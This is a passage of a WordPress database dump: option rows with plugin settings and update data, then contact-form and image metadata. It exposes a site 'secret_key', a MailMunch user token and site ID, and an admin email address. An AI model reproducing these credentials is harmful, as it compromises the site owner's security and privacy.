0007781982422;s:4:\"data\";i:1692893607;s:6:\"memory\";i:64798776;s:4:\"peak\";i:67633152;}i:1;a:6:{s:6:\"amount\";s:1:\"1\";s:4:\"time\";d:0.5110130310058594;s:6:\"perOne\";d:0.5110130310058594;s:4:\"data\";i:1692709460;s:6:\"memory\";i:51596360;s:4:\"peak\";i:65011712;}}','yes'),(319503,'wpephpcompat_is_wptide','1','yes'),(320264,'woocommerce_db_version','4.0.4','yes'),(320187,'w3tc_extensions_hooks','{\"actions\":[],\"filters\":[],\"next_check_date\":1692961767}','yes'),(321230,'wordfence_ls_version','1.1.4','yes'),(321231,'wfls_last_role_change','1693717890','no'),(321300,'wordfence_syncAttackDataAttempts','0','no'),(321301,'wordfence_syncingAttackData','0','no'),(321302,'wordfence_lastSyncAttackData','1705067038','no'),(324037,'revslider-global-settings','{\"tracking\":\"enabled\"}','yes'),(324038,'revslider-notices-dc','a:1:{i:0;s:8:\"TPRSV668\";}','yes'),(324039,'rs-templates-counter','0','no'),(323988,'mailmunch_activation_redirect','false','yes'),(324032,'revslider_table_version','1.0.12','yes'),(325501,'rs-tracking-data','a:6:{s:12:\"html_exports\";i:0;s:11:\"environment\";a:1:{s:7:\"version\";s:6:\"6.6.16\";}s:8:\"licensed\";O:15:\"RevSliderUpdate\":14:{s:3:\"css\";N;s:14:\"bad_extensions\";a:85:{i:0;s:3:\"php\";i:1;s:4:\"php2\";i:2;s:4:\"php3\";i:3;s:4:\"php4\";i:4;s:4:\"php5\";i:5;s:4:\"php6\";i:6;s:4:\"php7\";i:7;s:4:\"phps\";i:8;s:4:\"phps\";i:9;s:3:\"pht\";i:10;s:4:\"phtm\";i:11;s:5:\"phtml\";i:12;s:4:\"pgif\";i:13;s:5:\"shtml\";i:14;s:8:\"htaccess\";i:15;s:4:\"phar\";i:16;s:3:\"inc\";i:17;s:4:\"hphp\";i:18;s:3:\"ctp\";i:19;s:6:\"module\";i:20;s:3:\"asp\";i:21;s:4:\"aspx\";i:22;s:6:\"config\";i:23;s:4:\"ashx\";i:24;s:4:\"asmx\";i:25;s:4:\"aspq\";i:26;s:3:\"axd\";i:27;s:5:\"cshtm\";i:28;s:6:\"cshtml\";i:29;s:3:\"rem\";i:30;s:4:\"soap\";i:31;s:5:\"vbhtm\";i:32;s:6:\"vbhtml\";i:33;s:3:\"asa\";i:34;s:3:\"cer\";i:35;s:5:\"shtml\";i:36;s:3:\"jsp\";i:37;s:4:\"jspx\";i:38;s:3:\"jsw\";i:39;s:3:\"jsv\";i:40;s:4:\"jspf\";i:41;s:3:\"wss\";i:42;s:2:\"do\";i:43;s:6:\"action\";i:44;s:22:\"cfm, .cfml, .cfc, .dbm\";i:45;s:3:\"swf\";i:46;s:2:\"pl\";i:47;s:3:\"cgi\";i:48;s:4:\"yaws\";i:49;s:3:\"zip\";i:50;s:3:\"rar\";i:51;s:2:\"7z\";i:52;s:4:\"html\";i:53;s:3:\"htm\";i:54;s:2:\"js\";i:55;s:3:\"exe\";i:56;s:3:\"bat\";i:57;s:3:\"cmd\";i:58;s:3:\"vbs\";i:59;s:3:\"msi\";i:60;s:3:\"reg\";i:61;s:3:\"scr\";i:62;s:3:\"com\";i:63;s:3:\"pif\";i:64;s:3:\"jsp\";i:65;s:3:\"asp\";i:66;s:4:\"aspx\";i:67;s:3:\"cgi\";i:68;s:2:\"pl\";i:69;s:3:\"swf\";i:70;s:8:\"htaccess\";i:71;s:2:\"sh\";i:72;s:2:\"py\";i:73;s:2:\"rb\";i:74;s:3:\"ps1\";i:75;s:4:\"psm1\";i:76;s:3:\"jar\";i:77;s:4:\"jspx\";i:78;s:5:\"xhtml\";i:79;s:4:\"jspx\";i:80;s:5:\"shtml\";i:81;s:3:\"ini\";i:82;s:3:\"dll\";i:83;s:3:\"sys\";i:84;s:4:\"jspx\";}s:16:\"\0*\0_cache_ns_key\";N;s:13:\"\0*\0_rs_tables\";N;s:21:\"\0*\0_rs_tables_pattern\";N;s:27:\"\0RevSliderUpdate\0plugin_url\";s:33:\"https://www.sliderrevolution.com/\";s:27:\"\0RevSliderUpdate\0remote_url\";s:21:\"check_for_updates.php\";s:32:\"\0RevSliderUpdate\0remote_url_info\";s:23:\"revslider/revslider.php\";s:28:\"\0RevSliderUpdate\0plugin_slug\";s:9:\"revslider\";s:24:\"\0RevSliderUpdate\0version\";N;s:24:\"\0RevSliderUpdate\0plugins\";N;s:23:\"\0RevSliderUpdate\0option\";s:21:\"revslider_update_info\";s:21:\"\0RevSliderUpdate\0data\";O:8:\"stdClass\":0:{}s:5:\"force\";b:0;}s:6:\"slider\";a:9:{s:6:\"number\";i:4;s:7:\"premium\";i:0;s:6:\"import\";i:0;s:7:\"sources\";a:4:{s:6:\"custom\";i:4;s:4:\"post\";i:0;s:11:\"woocommerce\";i:0;s:6:\"social\";i:0;}s:11:\"navigations\";a:7:{s:6:\"arrows\";i:3;s:7:\"bullets\";i:3;s:4:\"tabs\";i:0;s:6:\"thumbs\";i:0;s:5:\"mouse\";i:0;s:5:\"swipe\";i:0;s:8:\"keyboard\";i:0;}s:8:\"parallax\";i:1;s:13:\"scrolleffects\";i:0;s:15:\"timeline_scroll\";i:0;s:11:\"color_skins\";i:4;}s:6:\"slides\";a:3:{s:6:\"number\";i:10;s:10:\"background\";a:2:{s:5:\"image\";i:6;s:5:\"solid\";i:4;}s:8:\"kenburns\";i:0;}s:5:\"layer\";a:9:{s:6:\"number\";i:78;s:5:\"types\";a:2:{s:5:\"image\";i:61;s:4:\"text\";i:17;}s:7:\"actions\";a:0:{}s:6:\"frames\";a:3:{s:7:\"frame_0\";i:78;s:7:\"frame_1\";i:78;s:9:\"frame_999\";i:78;}s:7:\"presets\";a:0:{}s:16:\"presets_modified\";i:0;s:4:\"loop\";i:0;s:7:\"library\";i:0;s:2:\"in\";a:2:{s:6:\"column\";i:0;s:5:\"group\";i:0;}}}','yes'),(322511,'secret_key','}d$T|u$KK2, /tn;3AbVD0#/BwYHSrlwDJ?wAu2.B!@C)Iz5w5X^v1`LCc=ML[B:','no'),(324120,'mailmunch_user_token','fEt9dVeS3SyZRi9gSWuZSDmJ','yes'),(324121,'mailmunch_site_id','1049445','yes'),(332973,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1697613185','no'),(339960,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1705698282;s:7:\"checked\";a:9:{s:10:\"succulents\";s:3:\"1.3\";s:14:\"twentynineteen\";s:3:\"1.4\";s:15:\"twentyseventeen\";s:3:\"2.2\";s:13:\"twentysixteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.1\";s:16:\"twentytwentyfour\";s:3:\"1.0\";s:15:\"twentytwentyone\";s:3:\"1.9\";s:17:\"twentytwentythree\";s:3:\"1.2\";s:15:\"twentytwentytwo\";s:3:\"1.5\";}s:8:\"response\";a:7:{s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.7\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.7.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentyseventeen\";a:6:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"3.5\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.3.5.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:13:\"twentysixteen\";a:6:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"3.1\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.3.1.zip\";s:8:\"requires\";s:3:\"4.4\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"2.5\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.2.5.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.2.1.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.3.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.6.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:1:{s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.0\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfour.1.0.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}}s:12:\"translations\";a:0:{}}','no'),(339961,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1705698283;s:8:\"response\";a:9:{s:31:\"backup-backup/backup-backup.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/backup-backup\";s:4:\"slug\";s:13:\"backup-backup\";s:6:\"plugin\";s:31:\"backup-backup/backup-backup.php\";s:11:\"new_version\";s:5:\"1.4.2\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/backup-backup/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/backup-backup.1.4.2.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/backup-backup/assets/icon-128x128.png?rev=2995566\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/backup-backup/assets/banner-772x250.png?rev=2429136\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";s:3:\"5.6\";s:14:\"upgrade_notice\";s:708:\"

What's new in 1.4.2?\n* [PRO] Added failure prevention when third party plugin(s) removes one of our files\n* [FIX] Adjusted the code to support and fit PHP 8.3 standards based on user reports (also PHP 5.6)\n* [FIX] Errors caused by removal of file that does not exist should be resolved (during database backup)\n* [FIX] Infinite number will be now converted to max allowed value, allowing upload of tables with INF values\n* [FIX] Attempt of minimizing PCL temporary file issues caused most likely by insufficent storage space\n* [NOTE] Added new default exclusion rules in terms of files (optional usage)\n* [NOTE] Extended hard directory blacklist\n* [NOTE] Upgraded analyst module to latest version

\";}s:39:\"copy-delete-posts/copy-delete-posts.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:31:\"w.org/plugins/copy-delete-posts\";s:4:\"slug\";s:17:\"copy-delete-posts\";s:6:\"plugin\";s:39:\"copy-delete-posts/copy-delete-posts.php\";s:11:\"new_version\";s:5:\"1.4.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/copy-delete-posts/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/copy-delete-posts.1.4.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/copy-delete-posts/assets/icon-128x128.png?rev=2997966\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/copy-delete-posts/assets/banner-772x250.jpg?rev=2267040\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";s:3:\"5.6\";s:14:\"upgrade_notice\";s:566:\"

What's new in 1.4.5?\n* [PRO/CHANGE] Default type conversion will be now post not page (custom type -> post type by default)\n* [PRO/FIX] Adjusted category duplication/assign method (useful for cross site duplication)\n* [FIX] Resolved issues with custom type category/tags duplication\n* [FIX] Review banner won't show up on post edit pages now\n* [NEW] Added smart taxonomy handler which can assign custom taxonomy to core fields\n* [NOTE] Upgraded analyst module to latest version\n* [NOTE] Tested with WordPress v6.4.2\n* [NOTE] Tested up to PHP v8.3

\";}s:35:\"litespeed-cache/litespeed-cache.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/litespeed-cache\";s:4:\"slug\";s:15:\"litespeed-cache\";s:6:\"plugin\";s:35:\"litespeed-cache/litespeed-cache.php\";s:11:\"new_version\";s:7:\"6.0.0.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/litespeed-cache/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/litespeed-cache.6.0.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/litespeed-cache/assets/icon-256x256.png?rev=2554181\";s:2:\"1x\";s:68:\"https://ps.w.org/litespeed-cache/assets/icon-128x128.png?rev=2554181\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/litespeed-cache/assets/banner-1544x500.png?rev=2554181\";s:2:\"1x\";s:70:\"https://ps.w.org/litespeed-cache/assets/banner-772x250.png?rev=2554181\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";b:0;}s:23:\"mailmunch/mailmunch.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/mailmunch\";s:4:\"slug\";s:9:\"mailmunch\";s:6:\"plugin\";s:23:\"mailmunch/mailmunch.php\";s:11:\"new_version\";s:5:\"3.1.6\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/mailmunch/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/mailmunch.3.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/mailmunch/assets/icon-256x256.png?rev=1198834\";s:2:\"1x\";s:62:\"https://ps.w.org/mailmunch/assets/icon-128x128.png?rev=1198834\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/mailmunch/assets/banner-1544x500.png?rev=1156979\";s:2:\"1x\";s:64:\"https://ps.w.org/mailmunch/assets/banner-772x250.png?rev=1156979\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";b:0;}s:48:\"php-compatibility-checker/wpengine-phpcompat.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:39:\"w.org/plugins/php-compatibility-checker\";s:4:\"slug\";s:25:\"php-compatibility-checker\";s:6:\"plugin\";s:48:\"php-compatibility-checker/wpengine-phpcompat.php\";s:11:\"new_version\";s:5:\"1.6.3\";s:3:\"url\";s:56:\"https://wordpress.org/plugins/php-compatibility-checker/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/php-compatibility-checker.1.6.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/php-compatibility-checker/assets/icon-256x256.png?rev=1446087\";s:2:\"1x\";s:78:\"https://ps.w.org/php-compatibility-checker/assets/icon-128x128.png?rev=1446087\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/php-compatibility-checker/assets/banner-1544x500.png?rev=1446087\";s:2:\"1x\";s:80:\"https://ps.w.org/php-compatibility-checker/assets/banner-772x250.png?rev=1446087\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:33:\"instagram-feed/instagram-feed.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/instagram-feed\";s:4:\"slug\";s:14:\"instagram-feed\";s:6:\"plugin\";s:33:\"instagram-feed/instagram-feed.php\";s:11:\"new_version\";s:5:\"6.2.7\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/instagram-feed/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/instagram-feed.6.2.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/instagram-feed/assets/icon-256x256.png?rev=2700807\";s:2:\"1x\";s:67:\"https://ps.w.org/instagram-feed/assets/icon-128x128.png?rev=2700807\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/instagram-feed/assets/banner-1544x500.png?rev=2679382\";s:2:\"1x\";s:69:\"https://ps.w.org/instagram-feed/assets/banner-772x250.png?rev=2679382\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.1\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:33:\"w3-total-cache/w3-total-cache.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/w3-total-cache\";s:4:\"slug\";s:14:\"w3-total-cache\";s:6:\"plugin\";s:33:\"w3-total-cache/w3-total-cache.php\";s:11:\"new_version\";s:5:\"2.6.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/w3-total-cache/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/w3-total-cache.2.6.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/w3-total-cache/assets/icon-256x256.png?rev=1041806\";s:2:\"1x\";s:67:\"https://ps.w.org/w3-total-cache/assets/icon-128x128.png?rev=1041806\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/w3-total-cache/assets/banner-772x250.jpg?rev=1041806\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:27:\"woocommerce/woocommerce.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:6:\"plugin\";s:27:\"woocommerce/woocommerce.php\";s:11:\"new_version\";s:5:\"8.5.1\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/woocommerce/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/woocommerce.8.5.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/woocommerce/assets/icon-256x256.gif?rev=2869506\";s:2:\"1x\";s:64:\"https://ps.w.org/woocommerce/assets/icon-128x128.gif?rev=2869506\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/woocommerce/assets/banner-1544x500.png?rev=3000842\";s:2:\"1x\";s:66:\"https://ps.w.org/woocommerce/assets/banner-772x250.png?rev=3000842\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.3\";s:6:\"tested\";s:5:\"6.4.2\";s:12:\"requires_php\";s:3:\"7.4\";}s:27:\"js_composer/js_composer.php\";O:8:\"stdClass\":6:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"new_version\";s:3:\"7.4\";s:6:\"plugin\";s:27:\"js_composer/js_composer.php\";s:3:\"url\";s:0:\"\";s:7:\"package\";b:0;s:4:\"name\";s:21:\"WPBakery Page Builder\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:2:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.3.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.3.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.8.6\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.8.6.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";}}}','no'),(339999,'_transient_doing_cron','1707349016.3456358909606933593750','yes'),(332166,'litespeed.conf.optm-dns_preconnect','[]','yes'),(339956,'_site_transient_timeout_theme_roots','1705700016','no'),(339957,'_site_transient_theme_roots','a:9:{s:10:\"succulents\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(339387,'_site_transient_timeout_php_check_d213f1e1e84c3e7ae5c13407915bc0ff','1705832410','no'),(339388,'_site_transient_php_check_d213f1e1e84c3e7ae5c13407915bc0ff','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:3:\"7.0\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(337393,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.4.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.4.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.4.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.4.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.4.2\";s:7:\"version\";s:5:\"6.4.2\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.4\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1705698281;s:15:\"version_checked\";s:5:\"6.4.2\";s:12:\"translations\";a:0:{}}','no'); /*!40000 ALTER TABLE `wpvt_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_postmeta` -- DROP TABLE IF EXISTS `wpvt_postmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_postmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_id` bigint(20) unsigned NOT NULL DEFAULT 0, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=15295 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_postmeta` -- LOCK TABLES `wpvt_postmeta` WRITE; /*!40000 ALTER TABLE `wpvt_postmeta` DISABLE KEYS */; INSERT INTO `wpvt_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (1,2,'_wp_page_template','default'),(2,3,'_wp_page_template','default'),(9,7,'_form','\n\n\n\n\n\n\n\n[submit \"Send\"]'),(10,7,'_mail','a:8:{s:7:\"subject\";s:24:\"My Blog \"[your-subject]\"\";s:6:\"sender\";s:37:\"My Blog \";s:4:\"body\";s:172:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on My Blog (http://tummyrevolution.com)\";s:9:\"recipient\";s:27:\"admin@tummyrevolution.co.uk\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(11,7,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:24:\"My Blog \"[your-subject]\"\";s:6:\"sender\";s:37:\"My Blog \";s:4:\"body\";s:114:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on My Blog (http://tummyrevolution.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:37:\"Reply-To: admin@tummyrevolution.co.uk\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(12,7,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(13,7,'_additional_settings',NULL),(14,7,'_locale','en_US'),(15,8,'_wp_attached_file','woocommerce-placeholder.png'),(16,8,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"woocommerce-placeholder.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"woocommerce-placeholder-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"woocommerce-placeholder-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s